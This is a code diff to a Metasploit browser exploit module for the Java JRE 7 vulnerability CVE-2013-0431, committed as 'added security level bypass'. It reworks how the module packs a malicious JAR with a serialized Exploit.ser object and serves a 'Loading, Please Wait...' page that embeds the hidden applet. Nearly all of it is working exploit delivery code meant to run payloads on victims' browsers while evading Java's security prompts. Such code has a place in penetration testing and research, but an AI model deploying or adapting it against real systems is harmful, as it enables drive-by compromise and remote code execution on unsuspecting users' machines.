added security level bypass

modules/exploits/multi/browser/java_jre17_jmxbean_2.rb

@@ -78,44 +78,37 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 	end
 
-
-	def setup
-		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class")
-		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class")
-		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-
-		@exploit_class_name = rand_text_alpha("Exploit".length)
-		@exploit_class.gsub!("Exploit", @exploit_class_name)
-		super
-	end
-
 	def on_request_uri(cli, request)
 		print_status("handling request for #{request.uri}")
 
 		case request.uri
 		when /\.jar$/i
-			jar = payload.encoded_jar
-			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
-			jar.add_file("B.class", @loader_class)
-			metasploit_str = rand_text_alpha("metasploit".length)
-			payload_str = rand_text_alpha("payload".length)
-			jar.entries.each { |entry|
-				entry.name.gsub!("metasploit", metasploit_str)
-				entry.name.gsub!("Payload", payload_str)
-				entry.data = entry.data.gsub("metasploit", metasploit_str)
-				entry.data = entry.data.gsub("Payload", payload_str)
-			}
-			jar.build_manifest
+			paths = [
+				[ "Exploit.ser" ],
+				[ "Exploit.class" ],
+				[ "B.class" ]
+			]
 
-			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
-		when /\/$/
-			payload = regenerate_payload(cli)
-			if not payload
-				print_error("Failed to generate the payload.")
-				send_not_found(cli)
-				return
+			p = regenerate_payload(cli)
+
+			jar  = p.encoded_jar
+
+			paths.each do |path|
+				1.upto(path.length - 1) do |idx|
+					full = path[0,idx].join("/") + "/"
+					if !(jar.entries.map{|e|e.name}.include?(full))
+						jar.add_file(full, '')
+					end
+				end
+				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
+				data = fd.read(fd.stat.size)
+				jar.add_file(path.join("/"), data)
+				fd.close
 			end
+
+			print_status("Sending Applet.jar")
+			send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+		when /\/$/
 			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
 		else
 			send_redirect(cli, get_resource() + '/', '')
@@ -126,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def generate_html
 		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
 		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+		html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="sample.jar"></embed>|
 		html += %Q|</applet></body></html>|
 		return html
 	end